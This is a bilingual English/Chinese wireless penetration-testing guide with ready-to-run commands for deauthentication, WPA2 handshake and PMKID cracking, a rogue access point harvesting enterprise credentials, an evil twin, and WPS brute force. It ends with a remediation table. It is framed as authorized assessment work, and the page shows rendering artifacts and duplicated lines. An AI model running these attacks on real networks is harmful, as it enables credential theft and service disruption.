Back to Details

performing-wireless-network-penetration-test

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Performing Wireless Network Penetration Test

执行无线网络渗透测试

Overview

概述

Wireless penetration testing evaluates the security of an organization's WiFi infrastructure including encryption strength, authentication mechanisms, rogue access point detection, client isolation, and network segmentation. Testing covers 802.11a/b/g/n/ac/ax protocols, WPA2-PSK, WPA2-Enterprise, WPA3-SAE, captive portals, and Bluetooth/BLE where in scope.
无线网络渗透测试用于评估组织WiFi基础设施的安全性,包括加密强度、认证机制、rogue access point检测、客户端隔离和网络分段。测试涵盖802.11a/b/g/n/ac/ax协议、WPA2-PSK、WPA2-Enterprise、WPA3-SAE、captive portals,以及范围内的Bluetooth/BLE。

When to Use

适用场景

  • When conducting security assessments that involve performing wireless network penetration test
  • When following incident response procedures for related security events
  • When performing scheduled security testing or auditing activities
  • When validating security controls through hands-on testing
  • 开展涉及无线网络渗透测试的安全评估时
  • 针对相关安全事件遵循事件响应流程时
  • 执行定期安全测试或审计活动时
  • 通过实操测试验证安全控制措施时

Prerequisites

前置条件

  • Written authorization specifying wireless scope (SSIDs, BSSIDs, physical locations)
  • Compatible wireless adapter supporting monitor mode and packet injection (e.g., Alfa AWUS036ACH, TP-Link TL-WN722N v1)
  • Kali Linux with Aircrack-ng suite, Bettercap, Wifite, Kismet
  • Physical proximity to target wireless networks
  • GPS receiver for mapping (optional)
  • 明确无线测试范围(SSID、BSSID、物理位置)的书面授权
  • 支持监听模式和数据包注入的兼容无线适配器(如Alfa AWUS036ACH、TP-Link TL-WN722N v1)
  • 安装有Aircrack-ng套件、Bettercap、Wifite、Kismet的Kali Linux系统
  • 与目标无线网络的物理距离接近
  • 用于映射的GPS接收器(可选)

Phase 1 — Wireless Reconnaissance

阶段1 — 无线侦察

Enable Monitor Mode

启用监听模式

bash
undefined
bash
undefined

Check wireless interfaces

检查无线接口

iwconfig airmon-ng
iwconfig airmon-ng

Kill interfering processes

终止干扰进程

airmon-ng check kill
airmon-ng check kill

Enable monitor mode

启用监听模式

airmon-ng start wlan0
airmon-ng start wlan0

Interface becomes wlan0mon

接口将变为wlan0mon

Verify monitor mode

验证监听模式

iwconfig wlan0mon
undefined
iwconfig wlan0mon
undefined

Passive Scanning

被动扫描

bash
undefined
bash
undefined

Discover all networks in range

发现范围内的所有网络

airodump-ng wlan0mon -w wireless_scan --output-format csv,pcap
airodump-ng wlan0mon -w wireless_scan --output-format csv,pcap

Filter by specific channel

按特定信道过滤

airodump-ng wlan0mon -c 6 -w channel6_scan
airodump-ng wlan0mon -c 6 -w channel6_scan

Scan 5GHz band

扫描5GHz频段

airodump-ng wlan0mon --band a -w 5ghz_scan
airodump-ng wlan0mon --band a -w 5ghz_scan

Scan all bands

扫描所有频段

airodump-ng wlan0mon --band abg -w full_scan
airodump-ng wlan0mon --band abg -w full_scan

Kismet passive scanning (advanced)

Kismet被动扫描(高级)

kismet -c wlan0mon
kismet -c wlan0mon

Access web UI at http://localhost:2501

http://localhost:2501访问Web界面

undefined
undefined

Network Inventory

网络清单

SSIDBSSIDChannelEncryptionClientsSignal
CorpWiFiAA:BB:CC:DD:EE:016WPA2-Enterprise45-55dBm
CorpGuestAA:BB:CC:DD:EE:0211WPA2-PSK12-60dBm
PrinterNetAA:BB:CC:DD:EE:031WEP3-70dBm
HiddenSSIDAA:BB:CC:DD:EE:0436WPA2-PSK8-65dBm
SSIDBSSID频道加密方式客户端数量信号
CorpWiFiAA:BB:CC:DD:EE:016WPA2-Enterprise45-55dBm
CorpGuestAA:BB:CC:DD:EE:0211WPA2-PSK12-60dBm
PrinterNetAA:BB:CC:DD:EE:031WEP3-70dBm
HiddenSSIDAA:BB:CC:DD:EE:0436WPA2-PSK8-65dBm

Phase 2 — WPA2-PSK Attack

阶段2 — WPA2-PSK攻击

Capture 4-Way Handshake

捕获四次握手包

bash
undefined
bash
undefined

Target specific network

定位特定网络

airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:02 -w corpguest wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:02 -w corpguest wlan0mon

Deauthenticate a client to force reconnection (handshake capture)

使客户端断开连接以强制重连(捕获握手包)

aireplay-ng -0 5 -a AA:BB:CC:DD:EE:02 -c FF:FF:FF:FF:FF:FF wlan0mon
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:02 -c FF:FF:FF:FF:FF:FF wlan0mon

Verify handshake captured

验证握手包是否捕获成功

aircrack-ng corpguest-01.cap
aircrack-ng corpguest-01.cap

Look for "1 handshake" in output

在输出中查找"1 handshake"

undefined
undefined

Crack WPA2 Key

破解WPA2密钥

bash
undefined
bash
undefined

Dictionary attack with Aircrack-ng

使用Aircrack-ng进行字典攻击

aircrack-ng -w /usr/share/wordlists/rockyou.txt corpguest-01.cap
aircrack-ng -w /usr/share/wordlists/rockyou.txt corpguest-01.cap

GPU-accelerated cracking with Hashcat

使用Hashcat进行GPU加速破解

Convert cap to hccapx format

将cap文件转换为hccapx格式

hcxpcapngtool -o hash.hc22000 corpguest-01.cap
hcxpcapngtool -o hash.hc22000 corpguest-01.cap

Hashcat mode 22000 (WPA-PBKDF2-PMKID+EAPOL)

Hashcat模式22000(WPA-PBKDF2-PMKID+EAPOL)

hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
-r /usr/share/hashcat/rules/best64.rule
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
-r /usr/share/hashcat/rules/best64.rule

PMKID attack (no client needed)

PMKID攻击(无需客户端)

hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_dump.pcapng
--filterlist_ap=AA:BB:CC:DD:EE:02 --filtermode=2 hcxpcapngtool -o pmkid_hash.hc22000 pmkid_dump.pcapng hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt
undefined
hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_dump.pcapng
--filterlist_ap=AA:BB:CC:DD:EE:02 --filtermode=2 hcxpcapngtool -o pmkid_hash.hc22000 pmkid_dump.pcapng hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt
undefined

Phase 3 — WPA2-Enterprise Attack

阶段3 — WPA2-Enterprise攻击

bash
undefined
bash
undefined

Set up rogue AP with EAP credential harvesting

搭建用于窃取EAP凭证的恶意AP

Using hostapd-mana

使用hostapd-mana

cat > hostapd-mana.conf << 'EOF' interface=wlan0mon ssid=CorpWiFi hw_mode=g channel=6 auth_algs=3 wpa=2 wpa_key_mgmt=WPA-EAP wpa_pairwise=CCMP TKIP rsn_pairwise=CCMP ieee8021x=1 eap_server=1 eap_user_file=hostapd.eap_user mana_wpe=1 mana_credout=creds.txt EOF
cat > hostapd-mana.conf << 'EOF' interface=wlan0mon ssid=CorpWiFi hw_mode=g channel=6 auth_algs=3 wpa=2 wpa_key_mgmt=WPA-EAP wpa_pairwise=CCMP TKIP rsn_pairwise=CCMP ieee8021x=1 eap_server=1 eap_user_file=hostapd.eap_user mana_wpe=1 mana_credout=creds.txt EOF

EAP user file

EAP用户文件

cat > hostapd.eap_user << 'EOF'
  • PEAP,TTLS,TLS,FAST "t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAP "t" [2] EOF
hostapd-mana hostapd-mana.conf
cat > hostapd.eap_user << 'EOF'
  • PEAP,TTLS,TLS,FAST "t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAP "t" [2] EOF
hostapd-mana hostapd-mana.conf

Captured MSCHAP challenges can be cracked

捕获到的MSCHAP挑战可被破解

Crack NetNTLMv1 from EAP-MSCHAP

破解EAP-MSCHAP中的NetNTLMv1

hashcat -m 5500 creds.txt /usr/share/wordlists/rockyou.txt
undefined
hashcat -m 5500 creds.txt /usr/share/wordlists/rockyou.txt
undefined

Phase 4 — Evil Twin Attack

阶段4 — 邪恶双胞胎攻击

bash
undefined
bash
undefined

Create evil twin with Bettercap

使用Bettercap创建邪恶双胞胎AP

sudo bettercap -iface wlan0mon
sudo bettercap -iface wlan0mon

Within Bettercap:

在Bettercap中执行:

wifi.recon on wifi.ap
wifi.recon on wifi.ap

Or manual evil twin with hostapd + dnsmasq

或使用hostapd + dnsmasq手动创建邪恶双胞胎AP

cat > evil_twin.conf << 'EOF' interface=wlan1 ssid=CorpGuest hw_mode=g channel=6 driver=nl80211 auth_algs=1 wpa=0 EOF
cat > evil_twin.conf << 'EOF' interface=wlan1 ssid=CorpGuest hw_mode=g channel=6 driver=nl80211 auth_algs=1 wpa=0 EOF

Start captive portal

启动强制门户

hostapd evil_twin.conf & dnsmasq --no-daemon --interface=wlan1 --dhcp-range=192.168.1.10,192.168.1.100,12h
--address=/#/192.168.1.1
hostapd evil_twin.conf & dnsmasq --no-daemon --interface=wlan1 --dhcp-range=192.168.1.10,192.168.1.100,12h
--address=/#/192.168.1.1

Deauth clients from real AP to force connection to evil twin

使客户端与真实AP断开连接,强制连接到邪恶双胞胎AP

aireplay-ng -0 0 -a AA:BB:CC:DD:EE:02 wlan0mon
undefined
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:02 wlan0mon
undefined

Phase 5 — Additional Tests

阶段5 — 其他测试

Rogue AP Detection

Rogue AP检测

bash
undefined
bash
undefined

Compare authorized AP list against discovered APs

将授权AP列表与发现的AP进行对比

Authorized BSSIDs from client documentation

客户端文档中的授权BSSID

Flag any unknown BSSIDs broadcasting corporate SSIDs

标记任何广播企业SSID的未知BSSID

Check for misconfigured APs

检查配置错误的AP

Personal hotspots bridging to corporate network

连接到企业网络的个人热点

IoT devices with default WiFi settings

使用默认WiFi设置的IoT设备

undefined
undefined

Client Isolation Testing

客户端隔离测试

bash
undefined
bash
undefined

After connecting to guest network:

连接到访客网络后:

Scan for other clients

扫描其他客户端

nmap -sn 192.168.10.0/24
nmap -sn 192.168.10.0/24

Attempt to reach corporate resources

尝试访问企业资源

nmap -sT -p 80,443,445,3389 10.0.0.0/24
nmap -sT -p 80,443,445,3389 10.0.0.0/24

Test VLAN hopping

测试VLAN跳跃

If guest network is not properly segmented from corporate

如果访客网络未与企业网络正确分段

undefined
undefined

WPS Attack

WPS攻击

bash
undefined
bash
undefined

Check for WPS-enabled APs

检查启用WPS的AP

wash -i wlan0mon
wash -i wlan0mon

WPS PIN bruteforce (if WPS enabled and not rate-limited)

WPS PIN暴力破解(如果WPS已启用且未限速)

reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -vv
reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -vv

Pixie-Dust attack (offline WPS PIN recovery)

Pixie-Dust攻击(离线WPS PIN恢复)

reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -K 1 -vv
undefined
reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -K 1 -vv
undefined

Findings Template

发现模板

FindingSeverityCVSSRemediation
WPA2-PSK with weak passphraseHigh8.1Use 20+ char passphrase or migrate to WPA2-Enterprise
WEP encryption on printer networkCritical9.1Upgrade to WPA2/WPA3, segment printer VLAN
WPS enabled on guest APMedium5.3Disable WPS on all access points
No client isolation on guestHigh7.5Enable AP isolation and VLAN segmentation
Corporate SSID broadcasts on rogue APHigh8.1Deploy WIDS/WIPS, implement 802.1X with cert validation
EAP-MSCHAP without cert pinningHigh7.5Enforce server certificate validation on all clients
发现项严重程度CVSS修复建议
使用弱密码的WPA2-PSK8.1使用20位以上的密码或迁移至WPA2-Enterprise
打印机网络使用WEP加密关键9.1升级至WPA2/WPA3,对打印机VLAN进行分段
访客AP启用WPS5.3在所有接入点上禁用WPS
访客网络未启用客户端隔离7.5启用AP隔离和VLAN分段
恶意AP广播企业SSID8.1部署WIDS/WIPS,实施带证书验证的802.1X
EAP-MSCHAP未启用证书固定7.5在所有客户端上强制启用服务器证书验证

References

参考资料